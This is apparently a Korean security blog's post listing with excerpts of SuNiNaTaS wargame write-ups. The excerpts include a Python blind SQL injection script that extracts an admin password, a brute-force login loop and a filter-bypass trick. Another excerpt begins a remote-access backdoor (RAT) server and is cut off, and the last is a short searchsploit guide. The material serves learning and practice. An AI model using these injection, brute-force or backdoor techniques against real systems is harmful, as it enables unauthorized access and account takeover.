오늘은 22번 문제를 풀겁니다. 일단 페이지 소스를 보면 "admin'"을 사용해서 블라인드 인젝션이 가능할 것 같습니다. admin' and len(pw) = 10 -- - 이렇게 비밀번호는 10자리라는 걸 알 수 있습니다. 파이썬으로 자동화 해보겠습니다. from requests import get url = 'http://suninatas.com/challenge/web22/web22.asp' password = '' for i in range(1, 10 + 1): for j in range(33, 128): par = f"?id=admin' and unicode(substring(pw,{i},1))={j}--&pw=hyomo" cookies = {'ASPSESSIONIDAACDSAQA': '자신의..
오늘은 8번째 문제를 풀어볼 겁니다 페이지 소스 먼저 보겠습니다. 힌트를 보니 아이디는 admin이고 비밀번호는 0부터 9999까지 사이라고 합니다. 브루트포스를 하면 플래그를 얻을 수 있을 것 같아 파이썬 코드를 짜봤습니다. from tqdm import tqdm from requests import post for i in tqdm(range(0, 9999 + 1)): posts = { 'id': 'admin', 'pw': i } attack = post('http://suninatas.com/challenge/web08/web08.asp',data=posts) if "Password Incorrect!" not in attack.text: print(f"password is {i}") break 이..
이번에는 3번 문제를 풀어보도록 하겠습니다. 처음에 소스코드를 봤지만 아무것도 없어서 이건 다른곳에서 푸는 문제라는 걸 생각했습니다. 그래서 말 그대로 한번 게시판에 들어가봤습니다. 하지만 글을 쓰는 곳이 없었습니다. free 쪽으로 가보도록 하겠습니다. free 쪽에는 글쓰는 곳이 있어서 거기로 이동했더니 url이 이렇습니다. 이 url은 아까 형식에 맞춰서 들어가면 여기에 글씨를 쓰면 클리어가 되는 걸 볼 수 있습니다.
오늘은 써나니타스 문제 1번을 풀도록 하겠습니다. 코드를 보면 Replace 우회기법을 사용하면 성공할수 있을 것 같은 에감이 듭니다. result = Replace(str,"a","aad") 이 코드는 'str' 변수에서 모든 "a"를 "aad"로 대체(교체)하는 역할을 합니다. 예를 들어, "amin"이라는 문자열은 "admin"로 변경됩니다. result = Replace(result,"i","in") 이 코드는 'str' 변수에서 모든 "i"를 "in"로 대체(교체)하는 역할을 합니다. 이것을 응용해서 admin을 출력하게 만들어보도록 하겠습니다. ami를 입력해 봅니다 admin으로 입력되어서 클리어가 되는 걸 볼 수 있습니다.
이 소프트웨어는 교육 목적으로만 사용됩니다! 누구에게도 피해를 입히는 데 사용하지 마십시오! 내 응용 프로그램을 사용하면 귀하는 모든 규칙에 자동으로 동의하고 귀하의 행동에 대한 책임을 집니다! 법률 위반은 심각한 결과를 초래할 수 있습니다! 개발자 hyomo는 이 프로그램으로 인한 오용이나 손상에 대해 책임지지 않습니다. 오늘은 백도어를 만들어 보도록 하겠습니다 server.pyimport socket, os class RAT_SERVER: def __init__(self, host, port): self.host = host self.port = port def build_connection(self): global client, addr, s s = socket.socket(socket.AF_INE..
1. searchsploit이란 우리가 모의해킹을 할 때 보안 취약점과 exploit검색하는 명령어 도구입니다. 정보 수집과 보안 분석에 유용하게 쓸 수 있습니다. exploitdb에서 검색하기 귀찮을 때 유용합니다. 물론 여기 있는 정보들은 대부분 exploitdb에서 가져온 정보들입니다. 칼리리눅스를 사용하고 있다면 searchsploit 명령어로 쓸 수 있습니다. > searchsploit 예를 들어 이렇게 활용할 수 있습니다 PATH: 취약점 공격코드들 경로 Exploit Title: 취약점 제목들 url로 정보를 확인하고 싶으면 -w 옵션을 주시면 됩니다. exploit 코드를 가져올려면 -m 를 입력하면 됩니다.